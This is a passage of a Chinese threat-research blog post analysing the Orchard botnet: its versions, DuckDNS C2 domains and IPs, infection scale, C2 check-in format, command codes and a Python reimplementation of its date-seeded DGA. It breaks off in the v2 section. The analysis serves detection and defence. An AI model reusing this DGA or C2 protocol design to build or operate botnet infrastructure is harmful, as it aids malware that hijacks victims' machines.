<p>&#x8BE5;&#x6280;&#x672F;&#x53D1;&#x73B0;&#x4E8E;&#x4E00;&#x4E2A;&#x540D;&#x4E3A;Orchard&#x7684;botnet&#x5BB6;&#x65CF;&#x3002;&#x81EA;&#x4ECE;2021&#x5E74;2&#x6708;&#x4EFD;&#x9996;&#x6B21;&#x68C0;&#x6D4B;&#x5230;&#x8BE5;&#x5BB6;&#x65CF;&#x4EE5;&#x6765;&#xFF0C;&#x6211;&#x4EEC;&#x53D1;&#x73B0;&#x5B83;&#x81F3;&#x5C11;&#x7ECF;&#x5386;&#x4E86;3&#x4E2A;&#x7248;&#x672C;&#x7684;&#x53D8;&#x5316;&#xFF0C;&#x4E2D;&#x95F4;&#x751A;&#x81F3;&#x5207;&#x6362;&#x8FC7;&#x7F16;&#x7A0B;&#x8BED;&#x8A00;&#x3002;&#x7ED3;&#x5408;&#x957F;&#x671F;&#x7684;&#x8DDF;&#x8E2A;&#x7ED3;&#x679C;&#x548C;&#x5176;&#x5B83;&#x7EF4;&#x5EA6;&#x7684;&#x4FE1;&#x606F;&#xFF0C;&#x6211;&#x4EEC;&#x8BA4;&#x4E3A;Orchard&#x4F1A;&#x662F;&#x4E00;&#x4E2A;&#x957F;&#x671F;&#x6D3B;&#x8DC3;&#x3001;&#x6301;&#x7EED;&#x53D1;&#x5C55;&#x7684;botnet&#x5BB6;&#x65CF;&#xFF0C;&#x503C;&#x5F97;&#x8B66;&#x60D5;&#x3002;&#x672C;&#x6587;&#x5C06;&#x4ECB;&#x7ECD;Orchard&#x7684;&#x6700;&#x65B0;DGA&#x6280;&#x672F;&#xFF0C;&#x4EE5;&#x53CA;&#x5B83;&#x8FD9;3&#x4E2A;&#x7248;&#x672C;&#x7684;&#x53D1;&#x5C55;&#x8FC7;&#x7A0B;&#x3002;&#x672C;&#x6587;&#x8981;&#x70B9;&#x5982;&#x4E0B;&#xFF1A;</p>
<ul>
<li>Orchard&#x662F;&#x4E00;&#x4E2A;&#x4F7F;&#x7528;&#x4E86;DGA&#x6280;&#x672F;&#x7684;botnet&#x5BB6;&#x65CF;&#xFF0C;&#x6838;&#x5FC3;&#x529F;&#x80FD;&#x662F;&#x5728;&#x53D7;&#x5BB3;&#x8005;&#x673A;&#x5668;&#x4E0A;&#x5B89;&#x88C5;&#x5404;&#x79CD;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x3002;</li>
<li>&#x4ECE;2021&#x5E74;2&#x6708;&#x81F3;&#x4ECA;&#xFF0C;&#x6211;&#x4EEC;&#x5148;&#x540E;&#x68C0;&#x6D4B;&#x5230;3&#x4E2A;&#x7248;&#x672C;&#x7684;Orchard&#x6837;&#x672C;&#xFF0C;&#x5747;&#x4F7F;&#x7528;&#x4E86;DGA&#x6280;&#x672F;&#x3002;</li>
<li>Orchard&#x7684;DGA&#x7B97;&#x6CD5;&#x4E00;&#x76F4;&#x672A;&#x53D8;&#xFF0C;&#x4F46;&#x65E5;&#x671F;&#x7684;&#x4F7F;&#x7528;&#x65B9;&#x5F0F;&#x4E00;&#x76F4;&#x5728;&#x53D8;&#xFF0C;&#x6700;&#x65B0;&#x7248;&#x540C;&#x65F6;&#x652F;&#x6301;&#x4F7F;&#x7528;&#x6BD4;&#x7279;&#x5E01;&#x8D26;&#x53F7;&#x4FE1;&#x606F;&#x6765;&#x751F;&#x6210;&#x5355;&#x72EC;&#x7684;DGA&#x57DF;&#x540D;&#x3002;</li>
<li>&#x9664;&#x4E86;DGA&#xFF0C;Orchard&#x8FD8;&#x786C;&#x7F16;&#x7801;&#x4E86;C2&#x57DF;&#x540D;&#x3002;</li>
<li>Orchard&#x76EE;&#x524D;&#x4ECD;&#x5728;&#x6D3B;&#x8DC3;&#xFF0C;&#x81F4;&#x529B;&#x4E8E;&#x95E8;&#x7F57;&#x5E01;&#x6316;&#x77FF;&#x3002;</li>
</ul>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><h2 id>&#x4F20;&#x64AD;&#x65B9;&#x5F0F;&#x3001;&#x89C4;&#x6A21;&#x4EE5;&#x53CA;&#x5F71;&#x54CD;&#x8303;&#x56F4;</h2>
<p>Orchard&#x91C7;&#x7528;&#x4E86;&#x201C;&#x786C;&#x7F16;&#x7801;&#x57DF;&#x540D;+DGA&#x201D;&#x7684;&#x5197;&#x4F59;C2&#x673A;&#x5236;&#xFF0C;&#x5E76;&#x4E14;&#x6BCF;&#x4E2A;&#x7248;&#x672C;&#x90FD;&#x786C;&#x7F16;&#x7801;&#x4E86;1&#x4E2A;&#x552F;&#x4E00;&#x7684;DuckDNS&#x52A8;&#x6001;&#x57DF;&#x540D;&#x4F5C;&#x4E3A;C2&#xFF0C;&#x6839;&#x636E;&#x5B83;&#x4EEC;&#x7684;DGA&#x5B9E;&#x73B0;&#x65B9;&#x5F0F;&#x548C;&#x786C;&#x7F16;&#x7801;&#x7684;&#x57DF;&#x540D;&#xFF0C;&#x6211;&#x4EEC;&#x628A;&#x5DF2;&#x7ECF;&#x68C0;&#x6D4B;&#x5230;&#x7684;Orchard&#x6837;&#x672C;&#x5206;&#x4E3A;3&#x4E2A;&#x7248;&#x672C;&#xFF1A;</p>
<pre><code>v1, orcharddns.duckdns.org
v2&#xFF0C;orchardmaster.duckdns.org
v3, ojena.duckdns.org
</code></pre>
<p>&#x5B83;&#x4EEC;&#x7684;&#x65F6;&#x95F4;&#x7EBF;&#x5982;&#x4E0B;&#xFF1A;</p>
<pre><code>* 2021&#x5E74;3&#x6708;&#xFF0C;&#x68C0;&#x6D4B;&#x5230;v1&#x7248;&#x672C;&#xFF0C;&#x4F7F;&#x7528;C++&#x5F00;&#x53D1;&#x3002;&#x7ED3;&#x5408;&#x5386;&#x53F2;&#x6570;&#x636E;&#xFF0C;&#x6211;&#x4EEC;&#x5C06;v1&#x9996;&#x6B21;&#x51FA;&#x73B0;&#x65F6;&#x95F4;&#x63D0;&#x524D;&#x5230;2021&#x5E74;2&#x6708;&#x3002;
* 2021&#x5E74;9&#x6708;&#xFF0C;&#x68C0;&#x6D4B;&#x5230;v2&#x7248;&#x672C;&#xFF0C;&#x5B83;&#x4F7F;&#x7528;Golang&#x548C;C++&#x7F16;&#x5199;&#x3002;
* 2022&#x5E74;7&#x6708;&#xFF0C;&#x68C0;&#x6D4B;&#x5230;v3&#x7248;&#x672C;&#xFF0C;&#x7F16;&#x5199;&#x8BED;&#x8A00;&#x56DE;&#x5230;C++&#x3002;
</code></pre>
<p>&#x8FD9;3&#x4E2A;&#x7248;&#x672C;&#x90FD;&#x652F;&#x6301;&#x901A;&#x8FC7;&#x611F;&#x67D3;USB&#x76D8;&#x7684;&#x65B9;&#x5F0F;&#x8FDB;&#x884C;&#x4F20;&#x64AD;&#xFF0C;&#x8FD9;&#x4E00;&#x70B9;&#x8DDF;&#x4F20;&#x7EDF;&#x7684;&#x75C5;&#x6BD2;&#x5F88;&#x50CF;&#xFF0C;&#x5177;&#x4F53;&#x5B9E;&#x73B0;&#x53C2;&#x8003;&#x540E;&#x9762;&#x7684;&#x201C;USB&#x611F;&#x67D3;&#x903B;&#x8F91;&#x201D;&#x90E8;&#x5206;&#x3002;&#x7406;&#x8BBA;&#x4E0A;&#xFF0C;Orchard&#x4E5F;&#x5B8C;&#x5168;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;&#x5176;&#x5B83;&#x65B9;&#x5F0F;&#x4F20;&#x64AD;&#x3002;</p>
<p>&#x5229;&#x7528;&#x6211;&#x4EEC;&#x7684;&#x56FE;&#x7CFB;&#x7EDF;&#x7ED3;&#x5408;PDNS&#x548C;&#x5176;&#x5B83;&#x7EF4;&#x5EA6;&#x7684;&#x6570;&#x636E;&#xFF0C;&#x6211;&#x4EEC;&#x53D1;&#x73B0;v1&#x548C;v2&#x7684;C2&#x5B58;&#x5728;&#x660E;&#x663E;&#x7684;&#x5171;&#x4EAB;IP&#x7684;&#x60C5;&#x51B5;&#xFF0C;&#x5982;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/-----C2.png" alt="-----C2" loading="lazy"></p>
<p>&#x56FE;&#x7CFB;&#x7EDF;&#x5E2E;&#x6211;&#x4EEC;&#x627E;&#x5230;&#x4E86;&#x66F4;&#x591A;&#x7684;C2 IP&#x548C;&#x57DF;&#x540D;&#xFF0C;&#x8BE6;&#x89C1;&#x540E;&#x9762;&#x7684;IoC&#x90E8;&#x5206;&#xFF0C;&#x8FD9;&#x91CC;&#x7684;&#x57DF;&#x540D;&#x7279;&#x70B9;&#x662F;&#x90FD;&#x4EE5;duckdns.org&#x7ED3;&#x5C3E;&#x3002;v3&#x56E0;&#x4E3A;&#x6BD4;&#x8F83;&#x65B0;&#xFF0C;&#x6CA1;&#x53D1;&#x73B0;&#x5176;&#x5B83;&#x7684;&#x5173;&#x8054;&#x57DF;&#x540D;&#xFF0C;&#x4E0B;&#x9762;&#x662F;v3&#x57DF;&#x540D;&#x7684;&#x6D3B;&#x8DC3;&#x60C5;&#x51B5;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/v3----.png" alt="v3----" loading="lazy"></p>
<p>&#x80FD;&#x770B;&#x5230;&#x5B83;&#x662F;&#x4ECA;&#x5E74;5&#x6708;&#x4E0A;&#x7EBF;&#xFF0C;&#x7136;&#x540E;&#x9010;&#x6E10;&#x6D3B;&#x8DC3;&#xFF0C;&#x76EE;&#x524D;&#x5E94;&#x8BE5;&#x4ECD;&#x7136;&#x5728;&#x6D3B;&#x8DC3;&#x671F;&#x5185;&#x3002;</p>
<p>&#x57FA;&#x4E8E;PDNS&#x6211;&#x4EEC;&#x5BF9;3&#x4E2A;&#x7248;&#x672C;&#x7684;&#x611F;&#x67D3;&#x89C4;&#x6A21;&#x505A;&#x4E86;&#x8BC4;&#x4F30;&#xFF0C;&#x5176;&#x4E2D;v1&#x548C;v2&#x8282;&#x70B9;&#x6570;&#x8FD1;&#x5343;&#xFF0C;v3&#x56E0;&#x4E3A;&#x51FA;&#x73B0;&#x8F83;&#x665A;&#xFF0C;&#x8282;&#x70B9;&#x6570;&#x4E0D;&#x5230;500&#xFF0C;&#x4E0B;&#x9762;&#x662F;&#x5404;&#x4E2A;&#x7248;&#x672C;&#x57DF;&#x540D;&#x5230;&#x5177;&#x4F53;IP&#x7684;&#x8BE6;&#x7EC6;&#x89E3;&#x6790;&#x6570;&#x3002;</p>
<pre><code># v1, orcharddns.duckdns.org
37, 45.61.185.36
413,  45.61.186.52
1301,  45.61.187.240
207, 205.185.124.143

# v2, orchardmaster.duckdns.org
45,  45.61.185.36
104, 45.61.186.52
659,  45.61.187.240

# v3, ojena.duckdns.org
418, 45.61.185.231
</code></pre>
<p>&#x9700;&#x8981;&#x5F3A;&#x8C03;&#x7684;&#x662F;&#x4E0A;&#x9762;&#x7684;&#x89C4;&#x6A21;&#x6570;&#x636E;&#x53EA;&#x662F;&#x6211;&#x4EEC;&#x89C6;&#x91CE;&#x5185;&#x770B;&#x5230;&#x7684;&#xFF0C;&#x5B9E;&#x9645;&#x7684;&#x5E94;&#x8BE5;&#x8981;&#x6BD4;&#x8FD9;&#x66F4;&#x591A;&#x3002;</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><h2 id>&#x6837;&#x672C;&#x5206;&#x6790;</h2>
<p>Orchard&#x6837;&#x672C;&#x5728;&#x6837;&#x672C;&#x5C42;&#x9762;&#x591A;&#x4F7F;&#x7528;loader&#xFF0C;&#x7528;&#x4E8E;&#x5BF9;&#x6297;&#x5206;&#x6790;&#x548C;&#x81EA;&#x6211;&#x4FDD;&#x62A4;&#x3002;&#x76EE;&#x524D;&#x770B;&#x5230;&#x7684;Orchard loader&#x5E76;&#x4E0D;&#x56FA;&#x5B9A;&#xFF0C;&#x5373;&#x4F7F;&#x5355;&#x4E2A;&#x7248;&#x672C;&#x4E5F;&#x4F1A;&#x51FA;&#x73B0;&#x591A;&#x79CD;loader&#x7684;&#x60C5;&#x51B5;&#xFF0C;&#x6BD4;&#x5982;v1&#x7248;&#x672C;&#x7684;Orchard&#x4EE5;base64&#x5B57;&#x7B26;&#x4E32;&#x7684;&#x5F62;&#x5F0F;&#x5B58;&#x5728;&#x4E8E;loader&#x4E2D;&#xFF0C;v2/v3&#x7248;&#x672C;&#x7684;&#x6837;&#x672C;&#x6709;&#x7684;&#x4EE5;&#x8D44;&#x6E90;&#x6587;&#x4EF6;&#x7684;&#x5F62;&#x5F0F;&#x5B58;&#x653E;&#x5728;loader&#x4E2D;&#x3002;&#x5404;&#x4E2A;&#x7248;&#x672C;&#x8FD8;&#x90FD;&#x66FE;&#x4F7F;&#x7528;&#x8FC7;&#x4F8B;&#x5982;VMP&#x3001;Enigma&#x7B49;&#x865A;&#x62DF;&#x58F3;&#x6765;&#x4FDD;&#x62A4;&#x81EA;&#x8EAB;&#x3002;&#x603B;&#x7684;&#x6765;&#x8BF4;&#xFF0C;Orchard&#x7684;&#x5DE5;&#x4F5C;&#x6D41;&#x7A0B;&#x53EF;&#x4EE5;&#x7528;&#x4E0B;&#x9762;&#x7684;&#x56FE;&#x6765;&#x603B;&#x7ED3;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/----3.png" alt="----3" loading="lazy"></p>
<p>Orchard&#x4E09;&#x4E2A;&#x7248;&#x672C;&#x7684;&#x529F;&#x80FD;&#x57FA;&#x672C;&#x76F8;&#x540C;&#xFF0C;&#x5305;&#x62EC;&#xFF1A;</p>
<ul>
<li>&#x4E0A;&#x4F20;&#x8BBE;&#x5907;&#x53CA;&#x7528;&#x6237;&#x4FE1;&#x606F;</li>
<li>&#x54CD;&#x5E94;&#x6307;&#x4EE4;/&#x4E0B;&#x8F7D;&#x6267;&#x884C;&#x4E0B;&#x4E00;&#x9636;&#x6BB5;&#x7684;&#x6A21;&#x5757;</li>
<li>&#x611F;&#x67D3;USB&#x5B58;&#x50A8;&#x8BBE;&#x5907;</li>
</ul>
<p>&#x4E0B;&#x9762;&#x4ECE;DGA&#x7B97;&#x6CD5;&#x3001;C2&#x901A;&#x4FE1;&#x548C;&#x4E3B;&#x673A;&#x884C;&#x4E3A;&#x7B49;&#x51E0;&#x4E2A;&#x7EF4;&#x5EA6;&#x5206;&#x522B;&#x5206;&#x6790;3&#x4E2A;&#x7248;&#x672C;Orchard&#x7684;&#x6838;&#x5FC3;&#x529F;&#x80FD;&#x3002;</p>
<h3 id="v1">v1&#x7248;&#x672C;</h3>
<p>&#x8BE5;&#x7248;&#x672C;&#x7684;&#x5206;&#x6790;&#x4EE5;MD5=5c883ff8539b8d04be017a51a84e3af8&#x7684;&#x6837;&#x672C;&#x4E3A;&#x57FA;&#x7840;&#x3002;&#x5B83;&#x5728;&#x8FD0;&#x884C;&#x65F6;&#x9996;&#x5148;&#x91CA;&#x653E;&#x5185;&#x5D4C;&#x7684;PE&#x6587;&#x4EF6;&#x5230;&#x81EA;&#x542F;&#x52A8;&#x76EE;&#x5F55;&#x4E0B;&#xFF0C;&#x6240;&#x91CA;&#x653E;&#x7684;PE&#x5728;&#x5185;&#x5B58;&#x4E2D;&#x8FDB;&#x884C;base64&#x89E3;&#x7801;&#x5F97;&#x5230;orchard&#x7684;&#x6570;&#x636E;&#xFF0C;&#x968F;&#x540E;&#x8BE5;PE&#x5C06;System32/SysWOW64&#x4E0B;&#x7684;&#x4EFB;&#x4E00;exe&#x4F5C;&#x4E3A;&#x5080;&#x5121;&#x8FDB;&#x7A0B;&#xFF0C;&#x6765;&#x8FD0;&#x884C;&#x4FDD;&#x5B58;&#x7684;orchard&#x4EE3;&#x7801;&#x3002;&#x8BE5;&#x7248;&#x672C;Orchard&#x6574;&#x4F53;&#x903B;&#x8F91;&#x5982;&#x4E0B;&#x56FE;&#xFF0C;&#x4E3B;&#x8981;&#x5206;&#x4E3A;&#x7F51;&#x7EDC;&#x901A;&#x4FE1;&#x548C;USB&#x611F;&#x67D3;&#x4E24;&#x90E8;&#x5206;&#xFF0C;&#x6700;&#x7EC8;&#x529F;&#x80FD;&#x53D6;&#x51B3;&#x4E8E;C2&#x4E0B;&#x53D1;&#x7684;&#x5177;&#x4F53;&#x6A21;&#x5757;&#xFF0C;&#x56E0;&#x6B64;orchard&#x672C;&#x8EAB;&#x53EF;&#x4EE5;&#x8BA4;&#x4E3A;&#x662F;&#x4E00;&#x4E2A;Downloader&#x7684;&#x89D2;&#x8272;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/v1----.png" alt="v1----" loading="lazy"></p>
<p>&#x6B64;&#x5904;&#x4E3B;&#x8981;&#x63CF;&#x8FF0;&#x5176;&#x7F51;&#x7EDC;&#x901A;&#x4FE1;&#x8FC7;&#x7A0B;&#xFF08;&#x4E09;&#x4E2A;&#x7248;&#x672C;&#x7684;USB&#x611F;&#x67D3;&#x903B;&#x8F91;&#x76F8;&#x540C;&#xFF0C;&#x8BE6;&#x89C1;USB&#x611F;&#x67D3;&#x4E00;&#x8282;&#xFF09;&#x3002;</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><p>C2&#x901A;&#x4FE1;&#x8FC7;&#x7A0B;&#x8F83;&#x4E3A;&#x7B80;&#x5355;&#xFF0C;bot&#x5728;check-in&#x8FC7;&#x7A0B;&#x4E2D;&#x5411;C2&#x53D1;&#x9001;&#x6536;&#x96C6;&#x5230;&#x7684;&#x4E3B;&#x673A;&#x4FE1;&#x606F;&#xFF0C;&#x7136;&#x540E;&#x7B49;&#x5F85;C2&#x54CD;&#x5E94;&#x7684;&#x6307;&#x4EE4;&#x3002;v1&#x7248;&#x672C;&#x6240;&#x6536;&#x96C6;&#x4FE1;&#x606F;&#x5305;&#x62EC;&#xFF1A;&#x5377;&#x5E8F;&#x5217;&#x53F7;&#xFF08;HWID&#xFF09;&#x3001;&#x7535;&#x8111;&#x540D;&#x79F0;&#x3001;&#x7528;&#x6237;&#x540D;&#x3001;&#x64CD;&#x4F5C;&#x7CFB;&#x7EDF;&#x540D;&#x79F0;&#x3001;&#x7CFB;&#x7EDF;&#x7248;&#x672C;&#x3001;&#x5DF2;&#x5B89;&#x88C5;&#x7684;&#x6355;&#x83B7;&#x9A71;&#x52A8;&#x7A0B;&#x5E8F;&#x540D;&#x79F0;&#x3001;&#x6740;&#x8F6F;&#x4FE1;&#x606F;&#x3001;&#x7236;&#x8FDB;&#x7A0B;&#x6587;&#x4EF6;&#x4FEE;&#x6539;&#x65F6;&#x95F4;&#x3001;&#x7F6E;&#x9876;&#x7A97;&#x53E3;&#x540D;&#x79F0;&#x53CA;&#x7A97;&#x53E3;&#x6807;&#x9898;&#x7B49;&#xFF0C;&#x8FD9;&#x4E9B;&#x4FE1;&#x606F;&#x4EE5;&#x201C;[o.r.c.h.a.r.d]&#x201D;&#x4F5C;&#x4E3A;&#x5206;&#x9694;&#x7B26;&#x8FDB;&#x884C;&#x62FC;&#x63A5;&#x540E;&#x53D1;&#x9001;&#xFF0C;&#x5982;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/v1.C-------4.png" alt="v1.C-------4" loading="lazy"></p>
<p>C2&#x54CD;&#x5E94;&#x6570;&#x636E;&#x683C;&#x5F0F;&#x4E00;&#x822C;&#x4E3A;&#x201C;&#x6307;&#x4EE4;+&#x6570;&#x636E;&#x201D;&#xFF0C;&#x6307;&#x4EE4;&#x7684;&#x529F;&#x80FD;&#x901A;&#x8FC7;&#x6307;&#x4EE4;&#x7801;&#x6307;&#x5B9A;&#x3002;&#x4E0B;&#x9762;&#x662F;&#x4E00;&#x4E2A;&#x5177;&#x4F53;&#x7684;C2&#x54CD;&#x5E94;&#xFF0C;&#x5176;&#x4E2D;&quot;[&amp;&amp;]&quot;&#x4EE3;&#x8868;&#x6307;&#x4EE4;&#x7801;2&#xFF0C;&#x4EE3;&#x8868;&#x4E0B;&#x8F7D;&#x6267;&#x884C;&#xFF0C;&#x5177;&#x4F53;&#x5904;&#x7406;&#x8FC7;&#x7A0B;&#x5206;&#x4E3A;2&#x79CD;&#xFF1A;&#x54CD;&#x5E94;&#x6570;&#x636E;&#x5982;&#x679C;&#x662F;URL&#xFF0C;&#x5219;&#x4E0B;&#x8F7D;URL&#x5BF9;&#x5E94;&#x7684;PE&#x5E76;&#x6267;&#x884C;&#xFF1B;&#x5982;&#x679C;&#x662F;base64&#x7F16;&#x7801;&#x7684;&#x5185;&#x5BB9;&#xFF0C;&#x5219;&#x5148;&#x89E3;&#x7801;&#x7136;&#x540E;&#x6267;&#x884C;&#x89E3;&#x7801;&#x540E;&#x7684;&#x6570;&#x636E;&#x3002;&#x6B64;&#x5904;&#x54CD;&#x5E94;&#x7684;&#x6570;&#x636E;&#x5B9E;&#x9645;&#x662F;base64&#x7F16;&#x7801;&#x7684;&#x65B0;&#x7248;&#x672C;PE&#x6587;&#x4EF6;&#xFF0C;&#x76F8;&#x5F53;&#x4E8E;&#x5347;&#x7EA7;&#xFF0C;&#x8FD9;&#x4E5F;&#x8868;&#x660E;&#x8001;&#x7248;&#x672C;&#x53EF;&#x80FD;&#x5DF2;&#x7ECF;&#x5E9F;&#x5F03;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/v1.C-------5.png" alt="v1.C-------5" loading="lazy"></p>
<p>v1&#x7248;&#x672C;&#x4E00;&#x5171;&#x5B9A;&#x4E49;&#x4E86;8&#x4E2A;&#x6307;&#x4EE4;&#xFF0C;&#x6307;&#x4EE4;&#x7801;&#x4E0E;&#x6307;&#x4EE4;&#x5B57;&#x7B26;&#x4E32;&#x7684;&#x5BF9;&#x5E94;&#x5173;&#x7CFB;&#x5982;&#x4E0B;&#xFF1A;</p>
<pre><code>1 \[=] 
2 \[&amp;&amp;] 
3 \[##] 
4 \[###] 
5 \[%%] 
6 \[%%%] 
7 \[#\_#] 
8 \[\_\_\] \[&gt;&gt;] \[&lt;&lt;] \[^^] \[\*\] \[\~\] \[@] \[!] \[#\*\#\] \[#@#] 
</code></pre>
<p>&#x7531;&#x4E8E;&#x67D0;&#x4E9B;&#x6307;&#x4EE4;&#x7F6E;&#x7A7A;&#xFF0C;8&#x4E2A;&#x6307;&#x4EE4;&#x5B9E;&#x9645;&#x5BF9;&#x5E94;&#x4E09;&#x79CD;&#x64CD;&#x4F5C;&#xFF08;&#x540E;&#x7EED;&#x7248;&#x672C;&#x5927;&#x540C;&#x5C0F;&#x5F02;&#xFF09;&#xFF1A;</p>
<ul>
<li>&#x6307;&#x4EE4;&#x7801;1&#x548C;2&#xFF1A;&#x5224;&#x65AD;&#x54CD;&#x5E94;&#x6570;&#x636E;&#x4E3A;URL&#x6216;&#x8005;PE&#xFF0C;&#x5982;&#x679C;&#x662F;URL&#x5219;&#x4E0B;&#x8F7D;&#x6267;&#x884C;&#xFF0C;&#x5982;&#x679C;&#x662F;PE&#xFF0C;&#x5219;&#x521B;&#x5EFA;&#x8FDB;&#x7A0B;&#x6267;&#x884C;&#xFF08;CreateProcess&#x521B;&#x5EFA;&#x8FDB;&#x7A0B;&#x3001;&#x5080;&#x5121;&#x8FDB;&#x7A0B;&#x3001;&#x8FDC;&#x7A0B;&#x7EBF;&#x7A0B;&#x6CE8;&#x5165;&#x7B49;&#xFF09;&#x3002;</li>
<li>&#x6307;&#x4EE4;&#x7801;3&#x3001;4&#x3001;8&#xFF1A;&#x7EC8;&#x7ED3;&#x5F53;&#x524D;&#x8FDB;&#x7A0B;&#x5220;&#x9664;&#x539F;&#x59CB;&#x6587;&#x4EF6;&#xFF0C;&#x6216;&#x8005;&#x91CD;&#x65B0;&#x542F;&#x52A8;&#x3002;</li>
<li>&#x6307;&#x4EE4;&#x7801;7&#xFF1A;&#x518D;&#x6B21;&#x6536;&#x96C6;C2&#x3001;port&#x3001;PID&#x3001;&#x6587;&#x4EF6;&#x540D;&#x4FE1;&#x606F;&#x5411;C2&#x8FDB;&#x884C;&#x53D1;&#x9001;&#xFF0C;&#x793A;&#x4F8B;&#xFF1A;orcharddns.duckdns.org[o.r.c.h.a.r.d]5890[o.r.c.h.a.r.d]2260[o.r.c.h.a.r.d]stage-3_.exe[o.r.c.h.a.r.d]</li>
</ul>
<h4 id="dga">DGA&#x7B97;&#x6CD5;</h4>
<p>v1&#x7684;DGA&#x4EE5;&#x65E5;&#x671F;&#x5B57;&#x7B26;&#x4E32;&#xFF08;&#x6BD4;&#x5982;&#x201C;2022/07/05&#x201D;&#xFF09;&#x4F5C;&#x4E3A;&#x8F93;&#x5165;&#xFF0C;&#x8BA1;&#x7B97;&#x5176;MD5&#x503C;&#xFF0C;&#x7136;&#x540E;&#x5C06;MD5&#x5B57;&#x7B26;&#x4E32;&#x5747;&#x5206;&#x6210;&#x957F;&#x5EA6;&#x4E3A;8&#x7684;&#x56DB;&#x4E2A;&#x5B50;&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x4F9D;&#x6B21;&#x4E0E; .com&#x3001;.net&#x3001;.org&#x3001;.duckdns.org &#x8FD9;4&#x4E2A;&#x540E;&#x7F00;&#x62FC;&#x63A5;&#xFF0C;&#x5F97;&#x5230;&#x6BCF;&#x5929;4&#x7EC4;16&#x4E2A;DGA&#x57DF;&#x540D;&#xFF0C;&#x7B97;&#x6CD5;&#x5B9E;&#x73B0;&#x5982;&#x4E0B;&#x3002;</p>
<pre><code># 2021/04/15
import datetime
import hashlib

days=30
for i in range(0, days):
    datex = (datetime.datetime.now() - datetime.timedelta(days=i)).strftime(&apos;%Y/%m/%d&apos;)
    print(&quot;seed: &quot;, datex)
    md5 = hashlib.md5(datex.encode()).hexdigest()
    print(&apos;md5: &apos;, md5)

    dga_list = []
    dga_list.append(md5[:8])
    dga_list.append(md5[8:16])
    dga_list.append(md5[16:24])
    dga_list.append(md5[24:32])
    for j in range(len(dga_list)):
        print(dga_list[j] + &apos;.com&apos;)
        print(dga_list[j] + &apos;.net&apos;)
        print(dga_list[j] + &apos;.org&apos;)
        print(dga_list[j] + &apos;.duckdns.org&apos;)
</code></pre>
<p>&#x793A;&#x4F8B;&#x57DF;&#x540D;&#x5982;&#x4E0B;&#xFF1A;</p>
<pre><code>seed:  2022/07/05
md5:  91ac64d29f78281ad802f44648b2137f
91ac64d2.com
91ac64d2.net
91ac64d2.org
91ac64d2.duckdns.org
9f78281a.com
9f78281a.net
9f78281a.org
9f78281a.duckdns.org
d802f446.com
d802f446.net
d802f446.org
d802f446.duckdns.org
48b2137f.com
48b2137f.net
48b2137f.org
48b2137f.duckdns.org
</code></pre>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><h3 id="v2">v2&#x7248;&#x672C;</h3>
<p>v2&#x7248;&#x672C;&#x51FA;&#x73B0;&#x4E86;&#x4E24;&#x79CD;&#x7F16;&#x7A0B;&#x8BED;&#x8A00;&#x5B9E;&#x73B0;&#x7684;&#x6837;&#x672C;&#xFF0C;&#x5206;&#x522B;&#x662F;Golang&#x548C;C++&#xFF0C;&#x4F46;&#x662F;&#x529F;&#x80FD;&#x76F8;&#x540C;&#x3002;&#x8FD9;&#x91CC;&#x7684;&#x5206;&#x6790;&#x4EE5;MD5=<a href="https://www.virustotal.com/gui/file/5da3a405fea843ed422c06987179e0ac47b915c1d12cc608ce4ecb187edf5f03/details?ref=blog.netlab.360.com">f3e0b960a48b433bc4bfe6ac44183b74</a>&#x7684;Golang&#x6837;&#x672C;&#x4E3A;&#x4F8B;&#xFF0C;&#x5B83;&#x7684;C2&#x521D;&#x59CB;&#x5316;&#x51FD;&#x6570;&#x5982;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#xFF0C;&#x80FD;&#x660E;&#x663E;&#x770B;&#x5230;&#x786C;&#x7F16;&#x7801;&#x7684;C2&#x57DF;&#x540D;&#x3002;</p>
<!--kg-card-end: markdown--><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2021/09/3.png" class="kg-image" alt loading="lazy"></figure><!--kg-card-begin: markdown--><p>v2&#x7248;&#x672C;&#x5F00;&#x59CB;&#x4F7F;&#x7528;json&#x683C;&#x5F0F;&#xFF0C;&#x5B57;&#x6BB5;&#x542B;&#x4E49;&#x76F8;&#x5BF9;&#x6E05;&#x6670;&#x3002;&#x5176;&#x6536;&#x96C6;&#x7684;&#x4FE1;&#x606F;&#x8DDF;v1&#x5927;&#x81F4;&#x76F8;&#x540C;&#xFF0C;&#x5305;&#x62EC;&#xFF1A;&#x5377;&#x5E8F;&#x5217;&#x53F7;&#xFF08;HWID&#xFF09;&#x3001;&#x7535;&#x8111;&#x540D;&#x79F0;&#x3001;&#x7528;&#x6237;&#x540D;&#x3001;&#x7CFB;&#x7EDF;&#x7248;&#x672C;&#x3001;&#x6740;&#x8F6F;&#x4FE1;&#x606F;&#x3001;&#x6D3B;&#x52A8;&#x7A97;&#x53E3;&#x4FE1;&#x606F;&#x7B49;&#xFF0C;&#x65B0;&#x589E;&#x7684;&#x5B57;&#x6BB5;&#x6709;&#xFF1A;.net&#x6846;&#x67B6;&#x7248;&#x672C;&#xFF08;&#x6BD4;&#x5982;v2.0.50727&#xFF09;&#x3001;USB 